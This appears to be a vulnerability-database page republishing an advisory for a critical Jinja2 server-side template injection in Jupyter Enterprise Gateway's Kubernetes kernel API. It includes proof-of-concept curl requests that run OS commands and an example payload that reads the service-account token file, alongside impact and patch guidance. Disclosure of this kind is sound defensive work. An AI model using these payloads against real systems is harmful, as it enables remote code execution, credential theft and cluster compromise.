Jupyter Enterprise Gateway CVE-2026-44181
CRITICAL
GHSA-f49j-v924-fx9w
Lifecycle Timeline
2DescriptionNVD
Summary
The environment variables (KERNEL_XXX) used during the rendering of the Kubernetes manifest are vulnerable to Server Side Template Injection (SSTI). By including Jinja2 template expressions it is possible to execution Python code and OS Commands in the Enterprise Gateway service. The code can use or steal the Kubernetes service account token, which can steal Kubernetes secrets and be used to fully compromise the Kubernetes cluster by scheduling a privileged pod or a pod with a hostPath volume mount.
Details
The KERNEL_POD_NAME variable is rendered using Jinja2, allowing for code execution via template expression statements, in this code: https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/enterprise_gateway/services/processproxies/k8s.py#L219-L247
The Jinja2 template for the Kubernetes manifest contains several kernel_xxx variables, in addition to kernel_pod_name discussed above, such as kernel_working_dir that are used when rendering the manifest and are all vectors for SSTI. https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/etc/kernel-launchers/kubernetes/scripts/kernel-pod.yaml.j2#L77
These values come from the environment passed in the API call, where they were KERNEL_XXX before being converted to lowercase.
https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/etc/kernel-launchers/kubernetes/scripts/launch_kubernetes.py#L130-L137
PoC
Simple demonstration of SSTI using {{7 * 7}}
curl http://enterprise-gateway.bdawg.svc.cluster.local:8888/api/kernels --data '{"name":"python_kubernetes", "env": {"KERNEL_POD_NAME": "bdawg-{{7 * 7}}" }}'{"id": "1094076f-35c6-48a5-ae60-0c943bb97a9a", "name": "python_kubernetes", "last_activity": "2025-07-17T07:14:42.155736Z", "execution_state": "starting", "connections": 0}Running kubectl get pods
NAME READY STATUS RESTARTS AGE
bdawg-49 1/1 Running 0 3m54sRemote code execution - OS Commands via SSTI
curl http://enterprise-gateway.notebooks.svc.cluster.local:8888/api/kernels --data '{"name":"python_kubernetes", "env": {"KERNEL_POD_NAME": "bdawg-{{ cycler.__init__.__globals__.os.popen(\"hostname\").read() }}", "KERNEL_NAMESPACE": "notebooks" }}'{"id": "85ec9431-d005-48d5-8127-5f022f2c5780", "name": "python_kubernetes", "last_activity": "2025-07-17T07NAME READY STATUS RESTARTS AGE
bdawg-enterprise-gateway-8695685bc8-klm4m 1/1 Running 0 2m25senterprise-gateway-8695685bc8-klm4m is the hostname of the Enterprise Gateway pod.
Enterprise Gateway RBAC
The Enterprise Gateway service account has R/W access to several resource kinds.
Stolen Enterprise Gateway service account kubectl auth can-i --list
Resources Non-Resource URLs Resource Names Verbs
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
rolebindings.rbac.authorization.k8s.io [] [] [get list create delete]
configmaps [] [] [get watch list create delete]
namespaces [] [] [get watch list create delete]
persistentvolumeclaims [] [] [get watch list create delete]
persistentvolumes [] [] [get watch list create delete]
pods [] [] [get watch list create delete]
secrets [] [] [get watch list create delete]
services [] [] [get watch list create delete]
scheduledsparkapplications.sparkoperator.k8s.io/status [] [] [get watch list create delete]
scheduledsparkapplications.sparkoperator.k8s.io [] [] [get watch list create delete]
sparkapplications.sparkoperator.k8s.io/status [] [] [get watch list create delete]
sparkapplications.sparkoperator.k8s.io [] [] [get watch list create delete]
[/.well-known/openid-configuration/] [] [get]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks/] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]Impact
This is a server side template injection that leads to remote code execution (python and OS commands).
An attacker can get remote code execution in the Enterprise Gateway pod and steal its Kubernetes service account's token. It can use the privileges to spy on and interfere with other Jupyter kernel, read, write, or delete configuration maps, read secrets, access persistent storage, privileged pods, or create pods with hostPath mounts, which can be used to compromise the complete cluster and all workloads on it.
AnalysisAI
Server-side template injection in Jupyter Enterprise Gateway versions 2.0.0rc2 through 3.2.x allows remote attackers to execute arbitrary Python code and OS commands in the Enterprise Gateway pod by injecting Jinja2 expressions into KERNEL_XXX environment variables sent via the kernel-creation API. Successful exploitation yields the gateway's Kubernetes service account token, which (per the published PoC RBAC dump) carries cluster-impacting verbs over pods, secrets, and persistent volumes - providing a realistic path to full Kubernetes cluster compromise. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | The attacker must be able to send an HTTP POST to the Enterprise Gateway's kernel-creation API (default /api/kernels on TCP 8888) with a JSON body containing an `env` object whose KERNEL_XXX keys carry Jinja2 expressions - specifically KERNEL_POD_NAME, KERNEL_NAMESPACE, KERNEL_WORKING_DIR, or any other kernel_* variable consumed by etc/kernel-launchers/kubernetes/scripts/kernel-pod.yaml.j2. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | No CVSS vector was published with this CVE, so attack vector and privileges-required must be inferred from the advisory. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker with network access to the Enterprise Gateway's /api/kernels endpoint (e.g. a tenant in the same Kubernetes cluster, or anyone reachable through a misconfigured ingress) sends a POST with an env value such as KERNEL_POD_NAME set to `bdawg-{{ cycler.__init__.__globals__.os.popen('cat /var/run/secrets/kubernetes.io/serviceaccount/token').read() }}`. … |
| Remediation | Vendor-released patch: upgrade jupyter_enterprise_gateway to 3.3.0 or later (pip install --upgrade 'jupyter_enterprise_gateway>=3.3.0'), per GHSA-f49j-v924-fx9w (https://github.com/jupyter-server/enterprise_gateway/security/advisories/GHSA-f49j-v924-fx9w). … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: Identify all Jupyter Enterprise Gateway deployments; confirm whether versions 2.0.0rc2-3.2.x are in production; assess accessibility of kernel-creation API. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
More from same product – last 7 days
Authentication bypass in Defense Unicorns UDS Identity Config versions 0.11.0 through 0.26.0 allows unauthenticated remo
Local privilege escalation and code execution in Microsoft Azure Kubernetes Service (AKS) is possible via a path travers
Privilege bypass in Jupyter Enterprise Gateway versions 2.0.0rc1 through 3.2.x allows remote unauthenticated attackers t
{id}) or delete (DELETE /api/projects) any project on the platform, triggering cascading deletion of associated Function
Sensitive credential disclosure in Sidero Labs Omni (versions 1.3.0–1.6.5 and 1.7.0–1.7.2) allows authenticated users wi
Share
External POC / Exploit Code
Leaving vuln.today